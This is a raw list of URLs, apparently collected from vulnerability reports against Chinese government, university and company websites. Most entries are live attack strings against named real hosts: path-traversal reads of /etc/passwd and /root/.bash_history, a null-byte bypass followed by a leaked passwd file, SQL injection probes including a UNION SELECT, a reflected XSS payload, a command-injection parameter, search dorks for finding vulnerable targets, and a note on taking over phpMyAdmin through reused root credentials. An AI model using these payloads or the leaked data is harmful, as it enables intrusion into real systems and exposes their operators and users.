http://mail.zol.com.cn/login.php?Lang=invalid../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././
./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././ http://mail.xgo.com.cn/login.php?Lang=invalid../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././ http://mail.abab.com/login.php?Lang=invalid../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././
./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././ http://119.187.133.226:8282/opac/publicNotice/reservationInLib http://tuchuang.czlib.com.cn/opac/publicNotice/reservationInLib http://opac.hkc.edu.cn/opac/publicNotice/reservationInLib http://opac.lixin.edu.cn/opac/publicNotice/reservationInLib http://opac3.wzlib.cn/opac/publicNotice/reservationInLib http://218.27.88.203/opac/publicNotice/reservationInLib http://interlib.gzyxlib.cn:8008/opac/publicNotice/reservationInLib http://119.187.133.226:8282/opac/publicNotice/reservationInLib http://tuchuang.czlib.com.cn/opac/publicNotice/reservationInLib http://widash.wiwide.com/uploadify/scripts/_notes/dwsync.xml http://www.phpyun.com/bbs/thread-8149-1-1.html http://www.phpyun.com/PHP%E4%BA%91%E4%BA%BA%E6%89%8D%E6%8B%9B%E8%81%98%E7%B3%BB%E7%BB%9FV3.2_Beta.rar https://h41183.www4.hp.com www4.hp.com http://cmccsh.wiwide.com/login http://www.zoomeye.org/ country:China http://61.131.97.246/ http://61.177.136.244/ http://61.177.136.248/ http://61.177.159.166/ http://61.177.136.234/ http://61.177.136.233/ http://zt.iciba.com/2014/xueba/table.php http://bbs.lenovo.com/changshuo/?handling=0 http://bbs.lenovo.com/changshuo/?handling=0 http://www.bjprd.com.cn/ http://202.113.128.61/tsweb/ 
http://202.113.128.61/tsweb/ebsys/fceform/common/djframe.htm?isfile=release&djsn=eb_runsql http://202.113.128.61/tsweb/ebsys/fceform/dj/eb_runsql.htm http://changanmeeting.app.bolaa.net/Login.aspx http://changanmeeting.app.bolaa.net/upload/news/detail/20141223/20141223143651_9319.asp http://changanmeeting.app.bolaa.net/1.asp http://www.minjiao.com/ http://dict.qq.pinyin.cn/dict_list?sort1=%D3%CE%CF%B7&sort2=%CD%F8%D3%CE%27%20and%201=1%23 http://dict.qq.pinyin.cn/dict_list?sort1=%D3%CE%CF%B7&sort2=%CD%F8%D3%CE%27%20and%201=2%23 http://www.yyipo.gov.cn/zscqj/login.php?gotopage=%2Fzscqj%2F http://www.myhack58.com/Article/html/3/8/2014/41709.htm) http://wusttest.sinaapp.com/news.php?news_id=12 http://xxx.xxx.com/data/account/?uid=(number) http://7m9bar.bama555.com/data/account/?uid=1 http://www.bama555.com/auth/login www.bama555.com www.69juzi.com www.vson.cc http://7m9bar.bama555.com/data/account/?uid=100000 http://beijing.liebiao.com/qitajiameng/135842185.html http://www.julaibao.com/ http://www.431801.okwei.com/ http://www.okwe1.com/ http://www.nongyou.com.cn/ http://218.58.124.131:8002/newlist2.aspx?deptid=3942&id=220 http://60.217.72.17:7140/newlist2.aspx?deptid=3942&id=270 http://123.134.189.60/newlist2.aspx?deptid=3942&id=274 http://218.56.40.229:8000/newlist2.aspx?deptid=3942&id=273 http://222.135.76.147:8100/newlist2.aspx?deptid=144&id=219 http://222.134.154.214:8000/newlist2.aspx?deptid=3942&id=249 http://www.notery.net/ http://www.notery.net/npage.asp?id=19 http://域名/sys/ http://www.hzgzc.com/2009/ http://dxgzccn.cnc119.000pc.net/ http://www.bygzc.cn/old/ http://www.hhhtgzc.com/ http://www.bhgzc.com/ http://sggzccn.cnc506.000pc.net/ http://61.187.56.43:8080/econ/ http://61.187.56.43:8080/Report/index.jsp http://album.zhenai.com/login/login.jsp?exit=1 http://www.jit.com.cn/ http://122.143.239.70:8090/zwdtSjgl/Directory/showNsjg.jsp?NsjgId=1736 http://222.160.175.90/zwdtSjgl/Directory/showNsjg.jsp?NsjgId=1769 
http://218.27.190.107:8080/zwdtSjgl/Directory/showNsjg.jsp?NsjgId=1622 http://222.34.78.21/zwdtSjgl/Directory/showNsjg.jsp?NsjgId=2189 http://222.160.140.29:8000/zwdtSjgl/Directory/showNsjg.jsp?NsjgId=1625 svn://112.124.104.112/vlinkage/code svn://112.124.104.112/vlinkage http://www.zugame.com/ http://jxjh.zugame.com/ http://jxjh.zugame.com/admin/login.aspx http://wooyun.org/bugs/wooyun-2010-069817 http://hea.gov.cn)出现服务器任意文件下载漏洞,包括passwd等,甚至/root/.bash_history查看管理员操作的历史记录,通过进一步渗透得知服务器是Suse http://hea.gov.cn/manage/content/docmanage/download.jsp?filePath=../etc/passwd http://hea.gov.cn/manage/content/docmanage/download.jsp?filePath=../root/.bash_history http://help.chinac.com服务器上有两个废弃站未删除,http://help.chinac.com:83还有,http://help.chinac.com:85,其中http://help.chinac.com:83/有phpmyadmin,root密码未猜测出来,http://help.chinac.com:85是论坛,uc_server存在弱口令,进入后查看应用管理,找到root密码,很幸运的是root密码正确,回到http://help.chinac.com:83/phpmyadmin http://www.lcwscgs.com/wscgs/liuyan.do http://60.211.179.22:9080/wscgs/liuyan.do http://58.59.39.43:9080/wscgs/liuyan.do http://cgs.qdpolice.gov.cn:9080/wscgs/liuyan.do http://218.59.228.162/wscgs/liuyan.do http://cgs.ytjj.gov.cn:9061/wscgs/liuyan.do http://www.wfcgs.com:9080/wscgs/liuyan.do http://www.bzwscgs.com:9080/wscgs/liuyan.do http://60.213.185.51:9080/wscgs/liuyan.do http://cgs.ijiaotong.com:9080/wscgs/liuyan.do http://60.211.179.22:9080/wscgs/liuyan.do http://extra.lenovo.com/ams/mod1_app2.php http://extra.lenovo.com/ams/mod1_app2.php?apply_content_exp=!%3D&apply_content_value=&datagrid_action=search&datagrid_page=1&id_exp=!%3D&id_va https://github.com/suxianbaozi/cache/blob/869bbda6ba0aaa267ca5b7f3abec1b6b747fdf4b/app-core/config/email.php http://www.jit.com.cn/ http://218.27.207.22/zwdtSjgl/info/dongtai_iframe.jsp?cid=4 http://139.209.60.6/zwdtSjgl/info/dongtai_iframe.jsp?cid=4 http://218.27.140.5/zwdtSjgl/info/dongtai_iframe.jsp?cid=4 http://218.62.81.171/zwdtSjgl/info/dongtai_iframe.jsp?cid=4 
http://61.232.168.107/zwdtSjgl/info/dongtai_iframe.jsp?cid=4 http://jsids.telecomjs.com http://jsids.telecomjs.com/ida40/module/open/page/query/queryBill.xhtml?operID=tz61735&hashCode=FCFD64964473DAFC5D82E38F5DD261E1 https://tender.wanda.cn/ https://tender.wanda.cn/file!download.ajax?id=365584 https://tender.wanda.cn/ https://tender.wanda.cn/announcement_template!listWeb.ajax http://wdcwx.wanda.cn/wanda.cn.rar http://shake.sd.chinamobile.com/ http://mail.hngytobacco.com/ http://mail.hngytobacco.com/webmail7/useraddress_list.jsp http://www.xt12365.gov.cn/newsshow_p.asp?l_c_id=465&id=465 http://www.ee.sdu.edu.cn/xuandao/teachers.php?user_id=76 http://www.ee.sdu.edu.cn/xuandao/teachers.php?user_id=76 http://www.ee.sdu.edu.cn/xuandao/teachers.php?user_id=76 http://www.sgklt.com/forum.php?mod=viewthread&tid=2529 http://suggestion.baidu.com/su;/1.bat?wd=&cb=calc||&sid=1440_2031_1945_1788&t=1362056239875 http://union.51wp.com/index.php?r=admin www.hangzhouit.gov.cn http://220.191.211.247:8400/public/login/preLogin.action http://220.191.211.247:8400/risen/public/forcePwd.action http://202.98.11.84/ http://202.98.11.95:88/info.php https://wap.wuhan.wandamoviepark.com/ https://wap.wuhan.wandamoviepark.com/Activate/PersonalDetail/WA20141224231220803 http://www.wandafilm.com/threeKingdoms.do?m=getLotteryAlluser http://www.wandafilm.com/teeOil.do?m=getTeeOilPrizeNameList http://www.hfnhsw.com/nhdetailpro.php?id=12 http://www.hfnhsw.com/newsdetaile.php?id=4 http://www.hfnhsw.com/nhdetailproe.php?id=12 http://www.biosundrug.com/newsdetaile.php?id=1 http://www.sulipharma.com/newsdetaile.php?id=13 http://www.ensky-chemical.com/newsdetaile.php?id=17 http://www.genabolix.com/newsdetaile.php?id=9 http://www.fortunachem.com/newsdetaile.php?id=2 inurl:article.aspx?columntitle= http://www.bdxzfw.cn/portal/xzsp_baodingshi/article.aspx?columntitle=%E7%AA%97%E5%8F%A3%E5%88%86%E5%B8%83 http://60.220.240.7/portal/xzsp_changzhi/article.aspx?columntitle=%E7%AA%97%E5%8F%A3%E5%88%86%E5%B8%83 
http://www.gyxzfw.net/portal/xzsp_xianqu/article.aspx?columntitle=%E6%9C%BA%E6%9E%84%E8%AE%BE%E7%BD%AE http://121.18.89.108/portal/xzsp_xianqu/article.aspx?columntitle=%E7%AA%97%E5%8F%A3%E7%94%B5%E8%AF%9D http://www.lxxzfwzx.com/portal/xzsp_xianqu/article.aspx?columntitle=%E7%AA%97%E5%8F%A3%E5%88%86%E5%B8%83 http://www.axxzfwzx.com/portal/xzsp2/article.aspx?columntitle=%E7%AA%97%E5%8F%A3%E7%94%B5%E8%AF%9D http://www.gjzwzx.cn/portal/xzsp3/article.aspx?columntitle=%E7%AA%97%E5%8F%A3%E5%88%86%E5%B8%83 http://www.zzxzfwzx.com/portal/xzsp2/article.aspx?columntitle=%E7%AA%97%E5%8F%A3%E5%88%86%E5%B8%83 http://www.ynxzwfw.gov.cn/portal/xzsp_yongnianxian/article.aspx?columntitle=%E7%AA%97%E5%8F%A3%E5%88%86%E5%B8%83 http://www.xsxzfwzx.com/portal/xzsp_xianqu/article.aspx?columntitle=%B4%B0%BF%DA%B5%E7%BB%B0 http://www.gbdqyw.com/portal/xzsp_xianqu/article.aspx?columntitle=%E7%AA%97%E5%8F%A3%E5%88%86%E5%B8%83 http://222.222.180.76:8002/portal/xzsp_xianqu/article.aspx?columntitle=%E7%AA%97%E5%8F%A3%E5%88%86%E5%B8%83 http://60.220.240.7/portal/xzsp_changzhi/article.aspx?columntitle=%E7%A http://www.sqlmap.org www.jxjava.com http://125.77.200.135:8000/ http://my.gfan.com/resete http://wooyun.org/bugs/wooyun-2014-086052 inurl:xianhuoshow.asp?id= http://www.meng008.com/xianhuoshow.asp?id=65 http://www.meng008.com/news.asp?id=1&key=%EF%BF%BD%D0%B3%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://www.meng008.com/xianhuo.asp?product_name=&page=2&type= http://www.meng008.com/xianhuoshow.asp?id=42 http://www.sqlmap.org www.meng00 https://github.com/kaven276/dialbook/blob/master/imp/eipmail.sql http://api.open.baidu.com/pae/ecosys/page/lottery?type=video&wd=%CE%E4%D4%F2%CC%EC&nowType=lottery%22%22%3E%3Cscript%3Ealert%281%29%3C/script%3E&site=iqiyi http://zsjggw.xnu.edu.cn/showLarger.aspx?paperName=a&qnum=2014&pagenum=1 http://p.hsort.com/showLarger.aspx?paperName=a&qnum=2014&pagenum=1 http://p.xyhuatai.com/showLarger.aspx?paperName=a&qnum=2014&pagenum=1 
http://dztb.cufe.edu.cn/showLarger.aspx?paperName=a&qnum=2014&pagenum=1 http://epaper.btwhw.com/showLarger.aspx?paperName=a&qnum=2014&pagenum=1 http://zsjggw.xnu.edu.cn/show.aspx?paperName=%E6%B9%98%E5%8D%97%E5%AD%A6%E9%99%A2%E6%8A%A5&qnum=20110628 http://p.hsort.com/show.aspx?paperName=%E6%B9%98%E5%8D%97%E5%AD%A6%E9%99%A2%E6%8A%A5&qnum=20110628 http://dztb.cufe.edu.cn/show.aspx?paperName=a&qnum=20110628 http://epaper.btwhw.com/show.aspx?paperName=a&qnum=20110628 http://mswkt.xxtyd.fj.cn http://mswkt.xxtyd.fj.cn/ms/detail/?id=2&p=2 http://219.141.216.41:88/Manager/default.aspx http://219.141.216.41:8080/Manager/default.aspx www.bjflyz.com http://www.bjflyz.com:801/law/site/site-case-info!toQuery.action http://job.cqupt.edu.cn//main/job/1/ http://job.cqupt.edu.cn//main/news/0/1/ http://netsecurity.51cto.com/art/201004/194888.htm http://1gmt.l.mob.com/BLLDZ http://weibo.com www.oooxm.com http://mp.weixin.qq.com http://www.jeenor.com/cn/newscat.asp?classid=10 http://www.cxgd-led.com/cn/newscat.asp?classid=2 http://www.wysyy.cn/cn/newscat.asp?classid=6 http://exporterkm.com/cn/newscat.asp?classid=1 http://www.shyuanhao.com/cn/newscat.asp?classid=10 http://trutecled.com/cn/newscat.asp?classid=1 http://www.xlyumei.com/cn/newscat.asp?classid=7 http://xiangshuncaster.com/cn/newscat.asp?classid=1 http://yitaijinli2013.gotoip2.com/cn/newscat.asp?classid=3 http://www.jeenor.com/cn/newscat.asp?classid=10 http://www.cxgd-led.com/cn/newscat.asp?classid=2 http://www.wysyy.cn/cn/newscat.asp?classid=6 http://www.mafengwo.cn/path/?from=headdrop http://wiclub.wiwide.com/.svn/ http://www.linuxidc.com/Linux/2012-07/65702.htm http://topic.cnmo.com/active/blog_wall.php?topic_id=346&userid=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,CONCAT%280x71746a6371,0x476d52624d5043624768,0x7164766771%29,NULL# http://210.36.80.99/pks/ http://port.okwei.com/FindPassword.aspx www.xxfda.gov.cn/m/index.php存在严重的sql注入,将各种提交参数改为自己构造的sql语句可以查询数据库的敏感数据 http://www.xagj.com.cn/tag.aspx?tag_name=%E6%97%85%E6%B8%B8 
http://www.xagj.com.cn/tag.aspx?tag_name=%E6%97%85%E6%B8%B8'%20--%20- http://www.xagj.com.cn/tag.aspx?tag_name=%E6%97%85%E6%B8%B8 http://mclub.migu.cn/cp.php?ac=thread&op=edit&pid=4713151&tagid=798 http://fgw.akss.gov.cn/admin/admin.asp http://abs-core.sf-express.com/api/user/getCoupons http://api.open.baidu.com/pae/ecosys/page/lottery?type=video&wd=xx&nowType=lottery&site=iqiyi http://api.open.baidu.com/pae/ecosys/page/lottery?type=video&wd=xx&nowType=lottery&site=iqiyi%27%22xxx http://os.jcloud.com/ http://www.zhengzh.12306.cn/Dzsw/Shky/hwky.wai/quickorder.action http://www.sheny.12306.cn/Dzsw/Shky/hwky.wai/quickorder.action http://www.lanzh.12306.cn/Dzsw/Shky/hwky.wai/quickorder.action http://www.nanch.12306.cn/Dzsw/Shky/hwky.wai//quickorder.action http://www.shangh.12306.cn/Dzsw/Shky/hwky.wai//quickorder.action http://www.guangzh.12306.cn/Dzsw/Shky/hwky.wai//quickorder.action inurl:webs inurl:lib inurl:action http://www.lib.ruc.edu.cn//admin/user_logon.action http://lib.shzu.edu.cn//admin/user_logon.action http://lib.kluniv.cn//admin/user_logon.action http://lib.xzmy.edu.cn//admin/user_logon.action http://www.lib.tyut.edu.cn//admin/user_logon.action http://lib.jlnu.edu.cn/admin/user_logon.action http://lib.bicea.edu.cn//admin/user_logon.action http://lib.kluniv.edu.cn//admin/user_logon.action http://www.whlib.gov.cn//admin/user_logon.action http://lib.fzxy.edu.cn//admin/user_logon.action http://leshan.139mm.cn/web/webhtml/yuyue.aspx?yyid=10 http://www.xatourism.gov.cn/Entertainment/entertainment_list.aspx?type=traffic&pid=220&id=222 http://www.jit.com.cn/ http://www.ilj.gov.cn/zwdtSjgl/infoDetail.jsp?id=461 http://218.62.81.171/zwdtSjgl/infoDetail.jsp?id=461 http://218.62.100.33:8000/zwdtSjgl/infoDetail.jsp?id=146 http://zwgk.wangqing.gov.cn/zwdtSjgl/infoDetail.jsp?id=121 http://218.62.90.168/zwdtSjgl/infoDetail.jsp?id=636 http://www.sciencep.com/e_second.php?id=44 https://124.238.218.79/ http://www.jit.com.cn/ 
http://www.ilj.gov.cn/zwdtSjgl/Directory/showDir.jsp?keyid=PI201307051520180523 http://218.27.207.21/zwdtSjgl/Directory/showDir.jsp?keyid=PI201101131105070841 http://zwgk.wangqing.gov.cn/zwdtSjgl/Directory/showDir.jsp?keyid=PI201412181107440207 http://218.62.81.171/zwdtSjgl/Directory/showDir.jsp?keyid=PI201101131105070841 http://218.62.100.33:8000/zwdtSjgl/Directory/showDir.jsp?keyid=PI201101131105070841 http://www.wahaha.com.cn/FSDownloadServlet?file_key=20140619074133653296.docx&file_name=2014年纸箱招标公告.docx http://www.wahaha.com.cn/FSDownloadServlet?file_key=20140619074133653296.docx&file_name=2014年纸箱招标公告.docx http://wx.csrcbank.com/active/index.php?action=ertonghuihua&type=pc&do=show&id=9743 http://wx.csrcbank.com/active/index.php?action=ertonghuihua&type=pc&do=show&id=9743 http://122.224.212.80:8080/html/login/Login.jsp site:wiwide.com http://profession3.wiwide.com/.svn/entries http://portalc.wiwide.com/.svn/entries http://widash-lz.wiwide.com/uploadify/scripts/_notes/dwsync.xml http://profession3.wiwide.com/uploadify/scripts/_notes/dwsync.xml http://portalc.wiwide.com/uploadify/scripts/_notes/dwsync.xml http://211.101.12.78:7777/uploadify/scripts/_notes/dwsync.xml http://liangan.wiclub.wiwide.com/uploadify/scripts/_notes/dwsync.xml http://yzb.sjtu.edu.cn/tutor/showTutorPic.ahtml?dsgh=../../../../../../../../../../etc/passwd%00.jpg root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System 
bus:/:/sbin/nologin usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin avahi-autoipd:x:170:170:Avahi Stack:/var/lib/avahi-autoipd:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rtkit:x:499:496:RealtimeKit:/proc:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin saslauth:x:498:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin avahi:x:70:70:Avahi Stack:/var/run/avahi-daemon:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin pulse:x:497:495:PulseAudio Daemon:/var/run/pulse:/sbin/nologin gdm:x:42:42::/var/lib/gdm:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin gschool:x:500:500:gschool:/home/gschool:/bin/bash pfeng:x:501:500::/home/gschool/workspace/information/mis/manager:/sbin/nologin photo:x:502:50::/usr:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash wisedu:x:503:503::/home/wisedu:/bin/bash squid:x:23:23::/var/spool/squid:/sbin/nologin http://www.lsqx.com/Knowledge/Details.aspx?ID=72 http://zb.sdo.com/ http://shixin.court.gov.cn http://shixin.court.gov.cn/personMore.do http://shixin.court.gov.cn/detail?id=921384 www.taizhou.gov.cn www.zpgt.gov.cn www.njqh.gov.cn www.wugang.gov.cn www.wugang.gov.cn soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/ xmlns:rec="http://receive.blf.jcms soapenv:Header/ soapenv:Body rec:wsGetWeb soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/ xsi:type="xsd:string xsi:type="xsd:string xsi:type="xsd:string xsi:type="xsd:string rec:wsGetWeb soapenv:Body soapenv:Envelope http://www.changde.gov.cn/jcms/services/WSSynchronize?wsdl 
http://www.cshtz.gov.cn/jcms/services/WSSynchronize?wsdl http://www.sdjs.gov.cn/jcms/service/WSSynchronize?wsdl http://www.njqh.gov.cn/jcms/service/WSSynchronize?wsdl http://www.lg.gov.cn/jcms/service/WSSynchronize?wsdl http://gzw.zj.gov.cn/jcms/service/WSSynchronize?wsdl http://www.sqsc.gov.cn/jcms/service/WSSynchronize?wsdl http://www.dongtai.gov.cn/jcms/services/WSSynchronize?wsdl http://www.sdfgw.gov.cn/jcms/service/WSSynchronize?wsdl http://ipad.zaozhuang.gov.cn/jcms/service/WSSynchronize?wsdl http://www.taizhou.gov.cn/jcms/service/WSSynchronize?wsdl http://www.sihong.gov.cn/jcms/services/WSSynchronize?wsdl http://ggzy.jinan.gov.cn/jcms/services/WSSynchronize?wsdl http://www.wugang.gov.cn/jcms/services/WSSynchronize?wsdl http://www.gzlps.gov.cn/jcms/services/WSSynchronize?wsdl http://www.zpgt.gov.cn/jcms/services/WSSynchronize?wsdl http://www.taojiang.gov.cn/jcms/services/WSSynchronize?wsdl http://tz.lda.gov.cn/jcms/service/WSSynchronize?wsdl http://www.huimin.gov.cn/jcms/service/WSSynchronize?wsdl http://autoweb.zjwst.gov.cn/jcms2.5//services/WSSynchronize?wsdl http://www.cncn.gov.cn/jcms/services/WSSynchronize?wsdl http://jsxy.zucc.edu.cn/jcms/services/WSSynchronize?wsdl http://www.gzdpc.gov.cn//jcms/services/WSSynchronize?wsdl http://www.ceec.net.cn/jcms/services/WSSynchronize?wsdl http://www.lixia.gov.cn/jcms/services/WSSynchronize?wsdl http://www.jinhua.gov.cn/jcms/services/WSSynchronize?wsdl http://zzb.10.gov.cn/jcms/services/WSSynchronize?wsdl http://www.ninghai.gov.cn/jcms/services/WSSynchronize?wsdl http://www.sihong.gov.cn/jcms/services/WSSynchronize?wsdl http://www.jining.gov.cn/jcms/services/WSSynchronize?wsdl http://www.jc.gansu.gov.cn/jcms/services/WSSynchronize?wsdl http://www.zgzhijiang.gov.cn/jcms/services/WSSynchronize?wsdl http://www.hzgjj.gov.cn/jcms/services/WSSynchronize?wsdl http://anxiang.gov.cn/jcms/services/WSSynchronize?wsdl http://jcms.nantong.gov.cn/jcms/services/WSSynchronize?wsdl 
http://www.geta.gov.cn/jcms/services/WSSynchronize?wsdl http://pub.jsds.gov.cn/jcms/services/WSSynchronize?wsdl http://www.sinotrans.com/jcms/service/WSSynchronize?wsdl http://www.jc.gansu.gov.cn/jcms/services/WSSynchronize?wsdl http://www.nbxsws.gov.cn/jcms/services/WSSynchronize?wsdl http://www.jsforestry.gov.cn/jcms/services/WSSynchronize?wsdl http://www.lc-news.com/jcms/services/WSSynchronize?wsdl http://www.xinghua.gov.cn/jcms/services/WSSynchronize?wsdl http://autoweb.zjwst.gov.cn/jcms2.5/services/WSSynchronize?wsdl http://www.jinxiang.gov.cn/jcms/services/WSSynchronize?wsdl http://www.sdxm.gov.cn/jcms25/service/WSSynchronize?wsdl http://www.xwzf.gov.cn/jcms24/service/WSSynchronize?wsdl http://www.zjdpc.gov.cn/jcms/services/WSSynchronize?wsdl http://www.jskx.org.cn/jcms/service/WSSynchronize?wsdl http://www.lzcgq.gov.cn/jcms/service/WSSynchronize?wsdl http://www.jdxc.net/jcms/service/WSSynchronize?wsdl http://sfl.zucc.edu.cn/jcms/service/WSSynchronize?wsdl http://nyyey.news.tcedu.com.cn/jcms/service/WSSynchronize?wsdl http://edu.tcjmxx.cn/jcms/service/WSSynchronize?wsdl http://www.haiyan.gov.cn/jcms/service/WSSynchronize?wsdl http://jiaowuchu.blcu.edu.cn/jcms/service/WSSynchronize?wsdl http://xjco.cscec.com/jcms/service/WSSynchronize?wsdl http://www.sinotrans-csc.com/jcms/service/WSSynchronize?wsdl http://njzx.news.tcedu.com.cn/jcms/service/WSSynchronize?wsdl http://www.weihai.gov.cn/jcms/service/WSSynchronize?wsdl 